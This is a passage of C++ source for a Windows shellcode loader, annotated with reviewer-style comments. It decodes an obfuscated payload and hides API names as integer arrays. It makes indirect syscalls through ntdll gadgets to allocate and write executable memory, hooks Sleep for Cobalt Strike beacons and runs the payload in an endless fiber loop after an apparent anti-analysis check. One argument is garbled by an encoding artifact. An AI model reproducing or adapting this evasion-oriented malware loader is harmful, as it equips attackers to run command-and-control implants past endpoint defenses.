    // Decode and reconstruct each segment
    // After this loop the full payload exists in plain form in the process heap,
    // independent of the executable region allocated below.
    for (auto encodedSegment : encodedSegments) {
        UINT_PTR decodedSegment = reinterpret_cast(DecodePointer(encodedSegment));

        // Extract each byte and place it in the shellcode buffer
        shellcode.push_back((decodedSegment >> 56) & 0xFF);
        shellcode.push_back((decodedSegment >> 48) & 0xFF);
        shellcode.push_back((decodedSegment >> 40) & 0xFF);
        shellcode.push_back((decodedSegment >> 32) & 0xFF);
        shellcode.push_back((decodedSegment >> 24) & 0xFF);
        shellcode.push_back((decodedSegment >> 16) & 0xFF);
        shellcode.push_back((decodedSegment >> 8) & 0xFF);
        shellcode.push_back(decodedSegment & 0xFF);
    }

    const int aZwAVM[] = { 90, 119, 65, 108, 108, 111, 99, 97, 116, 101, 86, 105, 114, 116, 117, 97, 108, 77, 101, 109, 111, 114, 121 }; // ZwAllocateVirtualMemory
    std::unique_ptr ZwAVM = unASCIIme(aZwAVM, (sizeof(aZwAVM) / sizeof(aZwAVM[0])));
    const PCHAR NtAVM = ZwAVM.get();

    SyscallEntry NtAllocateVirtualMemory = SSNLookup(NtAVM);
    dwSSN = NtAllocateVirtualMemory.SSN;
    qwJMP = NtAllocateVirtualMemory.Syscall;
    gadget = GoGoGadget(callR12gadgets);

    PVOID baseAddress = nullptr;            // null on input: no base address is requested
    SIZE_T regionSize = shellcode.size();   // payload length in bytes

    // Requests a committed and reserved private region in the current process with
    // PAGE_EXECUTE_READWRITE. Memory that is writable and executable at once and has no
    // image behind it is a standard memory-scan indicator. The result is stored in
    // status, which is not read again in this listing.
    // NOTE(review): the '®' in the fourth argument (the region-size pointer) is a page
    // encoding artifact.
    status = (NTSTATUS)CallR12(
        (PVOID)CallMe,
        6,
        gadget,
        NtCurrentProcess(),
        &baseAddress,
        (ULONGLONG)0,
        ®ionSize,
        (ULONGLONG)(MEM_COMMIT | MEM_RESERVE),
        (ULONGLONG)(PAGE_EXECUTE_READWRITE)
    );

    const int aZwWVM[] = { 90, 119, 87, 114, 105, 116, 101, 86, 105, 114, 116, 117, 97, 108, 77, 101, 109, 111, 114, 121 }; // ZwWriteVirtualMemory
    std::unique_ptr ZwWVM = unASCIIme(aZwWVM, (sizeof(aZwWVM) / sizeof(aZwWVM[0])));
    const PCHAR NtWVM = ZwWVM.get();

    SyscallEntry NtWriteVirtualMemory = SSNLookup(NtWVM);
    dwSSN = NtWriteVirtualMemory.SSN;
    qwJMP = NtWriteVirtualMemory.Syscall;
    gadget = GoGoGadget(callR12gadgets);

    SIZE_T bytesWritten = 0;

    // Copies the decoded bytes into the new region with a write-virtual-memory call
    // that targets the current process itself, not a remote one.
    status = (NTSTATUS)CallR12(
        (PVOID)CallMe,
        5,
        gadget,
        NtCurrentProcess(),
        baseAddress,
        shellcode.data(),
        (ULONGLONG)shellcode.size(),
        &bytesWritten
    );

    // Create a callable "function" from the allocated space
    void (*shellcodeFunc)() = (void(*)())baseAddress;

    // Hook Sleep and SleepEx for CS beacons
    // ReSleep is defined outside this listing; what its hooks do is not visible here.
    ReSleep();

    // The payload runs as a fiber start routine, so no new thread is created for it.
    // The fiber's start address points into the private region allocated above. Each
    // Win32 fiber call is routed through CallR12 like the NT calls.
    gadget = GoGoGadget(callR12gadgets);
    mainFiber = (LPVOID)CallR12((PVOID)ConvertThreadToFiber, 1, gadget, nullptr);

    gadget = GoGoGadget(callR12gadgets);
    shellcodeFiber = (LPVOID)CallR12((PVOID)CreateFiber, 3, gadget, NULL, (LPFIBER_START_ROUTINE)shellcodeFunc, NULL);

    // Switches to the payload fiber again every time control comes back here; there is
    // no exit condition.
    while (true) {
        gadget = GoGoGadget(callR12gadgets);
        CallR12((PVOID)SwitchToFiber, 1, gadget, shellcodeFiber);
    }
}

// GUI-subsystem entry point. FiveHourEnergy() is defined outside this listing and its
// purpose is not visible here; a non-zero result ends the process with fail-fast code
// 0x31337 before RunMe runs. Because RunMe loops forever, the return below is only
// reached if that changes.
INT WINAPI CALLBACK WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd) {
    if (FiveHourEnergy()) __fastfail(0x31337);

    RunMe();

    return 0;
}

// Disabled developer harness: collects matches for a two-byte pattern in ntdll and
// passes them to CheckGadgetPreBytes (not defined in this listing).
/*
int main() {
    BYTE sig[] = { 0xff, 0x27 };
    std::vector gadgets = CollectGadgets(sig, 2, hNtdll);
    CheckGadgetPreBytes(gadgets, 2, 8);
}
*/